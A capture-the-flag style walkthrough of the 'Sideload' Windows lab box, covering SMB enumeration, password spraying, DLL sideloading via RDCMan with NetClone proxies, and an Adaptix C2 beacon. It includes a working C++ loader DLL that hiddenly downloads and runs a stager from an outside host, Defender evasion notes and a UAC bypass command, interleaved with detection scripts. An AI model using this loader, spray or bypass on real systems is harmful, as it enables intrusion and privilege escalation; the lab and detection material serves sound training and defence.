Syk0

Sideload


This box is provided by HackSmarter https://www.hacksmarter.org/

Overview

Sideload is a Windows-based machine focused on DLL sideloading as a lateral movement technique. The attack chain begins with unauthenticated SMB enumeration, where guest access to a file share reveals a pentest report exposing usernames and hints about weak passwords. A RID-cycle bruteforce enumerates local accounts, and a targeted password spray using seasonal/company-themed wordlist variants yields valid credentials for jade.moreno. With write access to the IT share, the attacker abuses RDCMan's predictable DLL search order to plant a malicious DWrite.dll - cloned and proxied using NetClone - which delivers an Adaptix C2 beacon as lewis.hopkins. Lewis turns out to be a local admin. Defender blocks unobfuscated agents, so a minimal loader DLL is used to download and execute a Rust-based stager. Finally, a UAC bypass via SSPI in AdaptixC2 elevates to a high-integrity session, completing the privilege escalation path.


Recon

Start with a standard Nmap service scan alongside a full port sweep to identify all listening services on the target.

sudo nmap -sC -sV -vv -oA tcp 10.1.197.204; sudo nmap -sC -sV -vv -p- -oA allports 10.1.197.204

The scan reveals open SMB ports (445/139) among other services. SMB is an immediate target for unauthenticated enumeration.


Connect to the SMB service using impacket-smbclient with guest credentials (no password) to enumerate accessible shares without requiring valid domain credentials.

Guest access is permitted on the IT share, which is a common misconfiguration in internal environments. This share contains files left behind by IT staff that were not intended to be publicly readable.


Browsing the IT share uncovers a pentest report. This is a critical OPSEC failure on the target organization's part - storing a pentest report on a world-readable share leaks findings, usernames, and potentially password policies to an unauthenticated attacker.

The report reveals usernames (jade, lewis, darkairos) and context about the environment (the company name Sideload), all of which will be used to build a targeted password list.


Use netexec (nxc) to perform a RID cycle bruteforce over SMB. This technique queries the Security Account Manager (SAM) via a null or guest session to enumerate local and domain accounts by iterating through Relative Identifiers (RIDs), which are the numeric suffixes of Windows Security Identifiers (SIDs).

nxc smb 10.1.197.204 -u 'guest' -p '' --rid-brute

This produces a confirmed list of account names on the target, which is saved to a users file for use in the password spray.


Build a targeted password wordlist using context gathered from the pentest report - usernames, the company name, and common seasonal patterns. Organizations frequently use passwords following the format Season+Year.

potential_pass

Summer
Winter
Autumn
Spring
Sideload
Darkairos
jade
lewis
summer
winter
autumn
spring

The following Python script generates all combinations of these base strings with years from 2020 to 2026, producing a compact but contextually relevant wordlist:

# Combine every base word from potential_pass with the years 2020-2026
# (range's upper bound is exclusive, so 2027 yields 2020..2026).
with open("potential_pass", "r") as f:
    bases = [line.strip() for line in f if line.strip()]  # skip blank lines

for base in bases:
    for year in range(2020, 2027):
        print(f"{base}{year}")  # redirect stdout to the file handed to nxc

Spray the generated passwords against RDP using netexec. The --continue-on-success flag ensures the tool does not stop after the first hit, and --timeout 30 accommodates slower RDP response times.

nxc rdp 10.1.137.167 -u users -p ../exploit/pass_check --continue-on-success --timeout 30

The spray returns a valid credential pair: jade.moreno:Winter2026. This confirms the organization is using predictable seasonal passwords, a finding that was presumably noted in the pentest report found on the share.
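On the blue side of this step, the same spray shows up in the target's Security log as a burst of 4625 logon failures from one source address across many accounts. The following is an added example, not part of the original writeup: the event tuples are constructed, and treating logon types 3 and 10 as the RDP-related ones is an assumption about how nxc's RDP attempts get logged (type 3 when NLA handles the CredSSP pre-auth, type 10 otherwise).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log 4625 (logon failure) events reduced to the fields the
# rule needs: time, target account, source address, logon type.
SAMPLE_EVENTS = [
    ("2026-01-10 09:00:01", "jade.moreno",   "10.0.0.5", 3),
    ("2026-01-10 09:00:02", "lewis.hopkins", "10.0.0.5", 3),
    ("2026-01-10 09:00:03", "darkairos",     "10.0.0.5", 3),
    ("2026-01-10 09:00:04", "guest",         "10.0.0.5", 3),
    ("2026-01-10 09:00:05", "jade.moreno",   "10.0.0.5", 3),
    ("2026-01-10 09:00:06", "lewis.hopkins", "10.0.0.5", 3),
    ("2026-01-10 09:00:07", "darkairos",     "10.0.0.5", 3),
    ("2026-01-10 09:05:00", "lewis.hopkins", "10.0.0.9", 10),  # one mistyped password
]

# Assumption: RDP failures land as type 3 (NLA/CredSSP pre-auth) or type 10.
RDP_LOGON_TYPES = {3, 10}

def detect_spray(events, window=timedelta(minutes=5), min_accounts=3, min_failures=5):
    """Map source address -> sorted accounts for sources whose failures inside one
    sliding window cover at least min_accounts distinct users. A single user failing
    repeatedly (classic brute force) is deliberately not matched by this rule."""
    by_source = defaultdict(list)
    for ts, user, src, logon_type in events:
        if logon_type in RDP_LOGON_TYPES:
            by_source[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), user))
    alerts = {}
    for src, entries in by_source.items():
        entries.sort()
        start = 0
        for end in range(len(entries)):
            # Slide the window start forward until it spans at most `window`.
            while entries[end][0] - entries[start][0] > window:
                start += 1
            chunk = entries[start:end + 1]
            accounts = {user for _, user in chunk}
            if len(chunk) >= min_failures and len(accounts) >= min_accounts:
                alerts[src] = sorted(accounts)
                break
    return alerts
```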


Foothold

Validate the jade.moreno credentials against SMB to confirm their scope. They are valid for SMB as well as RDP, so Jade now has authenticated access to the shares.

Authenticated SMB access as jade.moreno reveals write permissions on the IT share. This is significant - write access to a share that other privileged users interact with creates an opportunity for file planting attacks, such as DLL sideloading.


Lateral Movement

With write access to the IT share, the next step is to identify how privileged users interact with files on that share. Process Monitor from Sysinternals is run on the target to observe process behavior - specifically, to capture DLL load attempts by applications running as higher-privileged users.

Process Monitor reveals that Remote Desktop Connection Manager (RDCMan) attempts to load DWrite.dll from its own application directory before falling back to C:\Windows\System32\. This is the classic DLL search order hijacking condition - if an attacker can place a malicious DWrite.dll in the directory RDCMan loads from (which happens to be on the writable IT share), any user launching RDCMan will execute the attacker's code.
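The Process Monitor observation above can be automated over a saved trace instead of scrolling through it by hand. This is an added example, not code from the original writeup or from HackSmarter: it parses a constructed ProcMon CSV export (default columns), flags DLL probes that failed outside the system directories (the hijack condition) and DLLs actually mapped from a UNC share (the post-planting signal). The \\SIDELOAD\IT\RDCMan path is an assumed location for the application.

```python
import csv
import io

# Constructed ProcMon CSV export (File > Save as CSV, default columns) standing in
# for the trace described above. PID 4120 is a clean start-up; PID 4388 is a later
# start after a DWrite.dll has appeared next to the application on the share.
SAMPLE_PROCMON_CSV = r'''
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","RDCMan.exe","4120","CreateFile","\\SIDELOAD\IT\RDCMan\DWrite.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","RDCMan.exe","4120","CreateFile","C:\Windows\System32\DWrite.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.3","RDCMan.exe","4120","Load Image","C:\Windows\System32\DWrite.dll","SUCCESS","Image Base: 0x7ff8a0000000"
"10:01:03.0","RDCMan.exe","4120","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:04.0","notepad.exe","5000","CreateFile","C:\Users\lewis\notes.txt","NAME NOT FOUND","Desired Access: Generic Read"
"10:07:00.0","RDCMan.exe","4388","CreateFile","\\SIDELOAD\IT\RDCMan\DWrite.dll","SUCCESS","Desired Access: Read Attributes"
"10:07:00.1","RDCMan.exe","4388","Load Image","\\SIDELOAD\IT\RDCMan\DWrite.dll","SUCCESS","Image Base: 0x7ff89f000000"
'''

# Directories the loader is expected to resolve system DLLs from; anything else is suspect.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

def _rows(csv_text):
    # ProcMon quotes every field; the csv module handles the embedded backslashes as-is.
    return csv.DictReader(io.StringIO(csv_text.strip()))

def hijack_candidates(csv_text):
    """(process, path) for DLL probes that failed outside the system directories:
    the loader looked there first, so a writable directory there is a sideloading slot."""
    return [(r["Process Name"], r["Path"]) for r in _rows(csv_text)
            if r["Operation"] == "CreateFile" and r["Result"] == "NAME NOT FOUND"
            and r["Path"].lower().endswith(".dll")
            and not r["Path"].lower().startswith(SYSTEM_DIRS)]

def unc_dll_loads(csv_text):
    """(process, path) for DLLs actually mapped from a UNC share: the signal that a
    planted DLL has been picked up, which a hardened baseline should never show."""
    return [(r["Process Name"], r["Path"]) for r in _rows(csv_text)
            if r["Operation"] == "Load Image" and r["Path"].startswith("\\\\")]
```

Run the same two functions over a trace of the patched setup (application moved off the share, or the DLL pinned via a manifest) and both lists should come back empty.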


Use NetClone to generate a proxy DLL. Rather than a bare malicious DLL (which would likely crash RDCMan and alert the user), NetClone creates a forwarding wrapper that proxies all legitimate DWrite.dll exports to the real system DLL while also executing the attacker's payload. The payload DLL (agent.x64.dll) is an Adaptix C2 agent.

.\NetClone.exe --target .\agent.x64.dll --reference C:\Windows\System32\DWrite.dll -o DWrite2.dll

The resulting DWrite2.dll is uploaded to the IT share path where RDCMan will load it. When lewis.hopkins (or another privileged user) opens RDCMan, the malicious DLL is loaded in their process context, executing the Adaptix agent and beaconing back to the C2 server.


The sideloaded DLL executes and a callback is received in Adaptix C2 as lewis.hopkins.

With a shell as Lewis, the user flag can now be retrieved.


Privilege Escalation

Checking Lewis's group memberships and privileges reveals that the account is a member of the local Administrators group.

However, Windows UAC (User Account Control) prevents a standard session from exercising admin privileges without elevation. Additionally, Windows Defender is active and repeatedly blocks attempts to run unobfuscated Adaptix agents directly, making it difficult to spawn an elevated session using standard payloads.


To work around Defender, a minimal C++ loader DLL is crafted. Its sole purpose is to use CreateProcessA to spawn a hidden cmd.exe that downloads a Rust-based stager (rr.exe) via PowerShell and executes it. The Rust loader is used because Defender has lower detection coverage for Rust-compiled binaries compared to common C++ or .NET agents.

// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <stdlib.h>
#include <Windows.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        STARTUPINFOA si = { 0 };
        PROCESS_INFORMATION pi = { 0 };
        si.cb = sizeof(si);
        si.dwFlags = STARTF_USESHOWWINDOW;   // honour wShowWindow below
        si.wShowWindow = SW_HIDE;

        // CreateProcess documents lpCommandLine as a writable buffer, so keep it
        // in a mutable array instead of casting away the const of a string literal.
        char cmd[] = "cmd.exe /c powershell -c wget http://10.200.47.86:8443/rr.exe -OutFile C:\\Windows\\Tasks\\rr.exe; Start-Process C:\\Windows\\Tasks\\rr.exe";

        if (CreateProcessA(
                NULL,
                cmd,
                NULL,
                NULL,
                FALSE,
                CREATE_NO_WINDOW,
                NULL,
                NULL,
                &si,
                &pi))
        {
            // The child keeps running; only our handles to it are released.
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The DLL is wrapped again with NetClone to produce a proxy DLL that forwards exports, preventing the target application from crashing when it loads it.

The proxy DLL is deployed via the same sideloading path. When executed, it downloads rr.exe to C:\Windows\Tasks\ (a writable directory that rarely triggers AV heuristics) and runs it. The Rust stager beacons back to Adaptix successfully, bypassing Defender.
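From a detection standpoint the loader above leaves a distinctive process chain: a remote-administration GUI spawning cmd.exe, a PowerShell download cradle in the command line, and a binary executing from C:\Windows\Tasks. The following added example (not from the original writeup) scores constructed Sysmon Event ID 1 style records against those three traits; the ATTACKER-HOST name, the \\SIDELOAD\IT\RDCMan path and mstsc.exe as a second watched parent are assumptions.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields,
# mirroring the chain the loader DLL produces. ATTACKER-HOST is a placeholder.
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"\\SIDELOAD\IT\RDCMan\RDCMan.exe",
     "CommandLine": r"cmd.exe /c powershell -c wget http://ATTACKER-HOST:8443/rr.exe -OutFile C:\Windows\Tasks\rr.exe; Start-Process C:\Windows\Tasks\rr.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -c wget http://ATTACKER-HOST:8443/rr.exe -OutFile C:\Windows\Tasks\rr.exe; Start-Process C:\Windows\Tasks\rr.exe"},
    {"Image": r"C:\Windows\Tasks\rr.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Tasks\rr.exe"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign admin use
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile Get-ChildItem C:\Users\lewis"},
]

TASKS_DIR = "c:\\windows\\tasks\\"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WATCHED_PARENTS = {"rdcman.exe", "mstsc.exe"}  # RDCMan from the page; mstsc.exe assumed
CRADLE = re.compile(r"(?i)\b(wget|iwr|curl|invoke-webrequest|downloadstring|downloadfile)\b.*https?://")

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the names of the rules one process-creation record trips."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    hits = []
    # A remote-admin GUI, or any program running off a share, has no business spawning a shell.
    if image in SHELLS and (parent in WATCHED_PARENTS or event["ParentImage"].startswith("\\\\")):
        hits.append("admin_tool_spawns_shell")
    if CRADLE.search(cmdline):
        hits.append("download_cradle")
    if TASKS_DIR in cmdline.lower():
        hits.append("references_tasks_dir")
    if event["Image"].lower().startswith(TASKS_DIR):
        hits.append("exec_from_tasks")
    return hits

def alerts(events):
    """(image basename, rules) for every record that trips at least one rule."""
    return [(basename(e["Image"]), triage(e)) for e in events if triage(e)]
```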


With a stable beacon running as lewis.hopkins (local admin), the UAC bypass built into AdaptixC2 is used. The uacbypass sspi module abuses the SSPI (Security Support Provider Interface) to trigger a privileged process start without a UAC prompt:

uacbypass sspi "powershell -c Start-Process C:\\Windows\\Tasks\\rr.exe"

This relaunches rr.exe in a high-integrity (elevated) context, resulting in a new Adaptix beacon with full administrative privileges. The machine is fully compromised.